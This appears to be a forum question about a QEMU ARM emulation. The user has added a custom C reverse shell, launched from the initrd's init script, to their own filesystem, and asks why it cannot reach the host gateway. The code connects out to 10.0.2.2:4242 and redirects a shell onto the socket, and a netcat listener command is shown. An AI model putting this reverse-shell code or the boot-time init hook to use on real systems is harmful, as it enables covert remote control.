I have .cpio file containing a filesystem that is loaded as initrd for a QEMU emulation. Here's the run.sh script:
#!/bin/sh
qemu-system-arm \
-m 1024 \
-M virt,highmem=off \
-kernel zImage \
-initrd filesystem.cpio \
-nic user,hostfwd=tcp:0.0.0.0:8080-:80
-nographic
Since I want to spawn a reverse shell, I statically compiled one and included it in the /bin folder of the decompressed filesystem. The executable is trying to establish a TCP connection with 10.0.2.2:4242 (which I saw is QEMU's gateway address), and then launch a /bin/bash.
This is the code for my revshell:
int main(void) {
int sockfd;
struct sockaddr_in serv_addr;
printf("Launching reverse shell...\n");
sockfd = socket(AF_INET, SOCK_STREAM, 0);
if (sockfd == -1) {
perror("Socket creation failed");
exit(EXIT_FAILURE);
}
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(4242);
serv_addr.sin_addr.s_addr = inet_addr("10.0.2.2");
printf("Trying to connect to %s on port %d...\n", inet_ntoa(serv_addr.sin_addr), ntohs(serv_addr.sin_port));
if (connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) != 0) {
perror("Connection with the server failed");
exit(EXIT_FAILURE);
}
printf("Connected successfully. Executing shell...\n");
dup2(sockfd, STDIN_FILENO);
dup2(sockfd, STDOUT_FILENO);
dup2(sockfd, STDERR_FILENO);
[etc...]
To execute the reverse shell, I modified the init file accordingly and compressed everything back.
This is the init file:
#!/bin/busybox ash
/bin/busybox mount -t sysfs sysfs /sys
/bin/busybox mount -t proc proc /proc
/bin/busybox mount -t tmpfs tmpfs /dev
/bin/busybox mkdir -p /dev/shm
/bin/busybox mkdir -p /dev/pts
/bin/busybox mount -t devpts devpts /dev/pts
/bin/busybox mount -t debugfs none /sys/kernel/debug
# Populate /dev according to /sys
/bin/busybox mknod -m 660 console c 5 1
/bin/busybox mknod -m 660 null c 1 3
/bin/busybox mdev -s
/bin/busybox --install -s
echo "Welcome!" > /dev/console
/bin/reverseshell &
exec /sbin/init "$@" </dev/console >/dev/console 2>&1
As you can see I already have a console that spawns as soon as the virtualization starts, but it's full of junk and QEMU errors, that's why I need a reverse shell.
Then, I set up a netcat listener over the 4242 port via nc -lnvp 4242.
However, when launching the run.sh script, I end up with the following errors:
...
[ 1.001342] Freeing unused kernel image (initmem) memory: 2048K
[ 1.007212] Run /init as init process
Welcome!
Launching reverse shell...
Trying to connect to 10.0.2.2 on port 4242...
Connection with the server failed: Network is unreachable
...
And no connection received by the listener on my host. I am pretty noob with QEMU, and I do not know many of its features. Can you help me with this issue? Thanks in advance :)